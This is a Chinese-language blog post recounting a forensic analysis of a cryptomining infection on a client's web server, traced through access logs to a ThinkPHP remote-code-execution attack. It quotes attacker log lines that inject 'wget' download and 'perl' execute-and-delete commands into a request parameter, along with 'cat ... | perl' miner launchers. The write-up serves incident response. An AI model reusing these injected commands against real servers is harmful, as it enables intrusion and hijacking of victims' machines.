一次挖矿病毒攻击分析

作者 折戟 日期 2019-04-15
一次挖矿病毒攻击分析

一次挖矿病毒攻击分析


这两天期末了,最近老板这里突然来了个任务,客户服务器被攻击了,某台机器的cpu一直都跑满了,持续高负荷状态,客户公司的运营实在没有办法找到了我们。
先说一说之前这台服务器也出现过问题,被两波人搞过,一波写了webshell,另个一种了挖矿病毒,都被清除了,当然这些我都没有参与。
因为老板比较忙,我和另一个小伙伴接手进行分析,我们拿到这台服务器,既然是web服务器,最好得最有效的办法就是看web日志,但是这个日志是在很多,这就考虑经验问题了,另一个小伙伴道行比我深,他发现了痕迹:

$ cat aso_access.log | grep "wget" | grep "/2019"|grep "200"

通过很多尝试,在筛选“wget”的时候找到了攻击痕迹。

$ xxx.xxx.xxx.xxx - - [xx/xx/2019:xx:xx:xx +0800] "POST /?module=wget [http://xxx.xxx.xxx.xxx/ibus](http://xxx.xxx.xxx.xxx/ibus) -O /tmp/6b5a412bb56c0f0af33017cc88718de3 HTTP/1.1" 200 2979 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0"

emmmmm,看到这个POST的请求,基本可以猜测出就是这几天爆出的thinkphp新的rce,具体读者可以去看看相关的报告,rce的分析网上也有了,有想去的可以去了解一下。根据这条日志,筛选ip我们找到了具体的攻击痕迹:

$ xxx.xxx.xxx.xxx - - [xx/xx/2019:xx:xx:xx +0800] "POST /?module=wget [http://xxx.xxx.xxx.xxx/ibus](http://xxx.xxx.xxx.xxx/ibus) -O /tmp/6b5a412bb56c0f0af33017cc88718de3 HTTP/1.1" 200 2979 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0"

上传ibus脚本文件到tmp目录下命名为指定文件,这里www用户有对tmp目录的读写权限。

$ xxx.xxx.xxx.xxx - -  [xx/xx/2019:xx:xx:xx +0800]  "POST /?module=perl /tmp/6b5a412bb56c0f0af33017cc88718de3;sleep 2;rm -rf /tmp/6b5a412bb56c0f0af33017cc88718de3 HTTP/1.1" 200 3699 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0"

执行tmp中上传的指定文件,并等待执行完成,删除文件.
本地虚拟环境执行了一下这个ibus脚本:
本地执行脚本
可以看到这里执行生成了三个sh简单加密的脚本文件:nmi,nbus和.dbus是哪个文件,这三个脚本文件解密之后是三个cat和perl的脚本,分别执行了一下命令:

$ cat /xxx/xxx/xxx/xxx/Favicon.ico | perl
$ cat /xxx/xxx/pkcs | perl
$ cat /xxx/xxx/xxx/xxxxx/xxx/xxxxxx/mockup | perl

执行了三个perl脚本,就是挖矿的脚本了。最后我们把生成的恶意文件备份之后就进行清除了,总共是三个sh脚本,三个perl挖矿脚本和两个记录id的随机数之类的文件。
怎么说呢,这次攻击分析看似挺简单的,但是最难的部分,从日志里找出攻击者的恶意访问是很困难的,需要有很多的经验,比如对最近新漏洞的了解,以及各类典型漏洞的攻击方式,才能及时的从庞大的日志文件中根据特征找到攻击者的痕迹。
安全从业者还是十分吃经验的,博主也会更多的在实战中历练自己,也会分享记录自己的经验。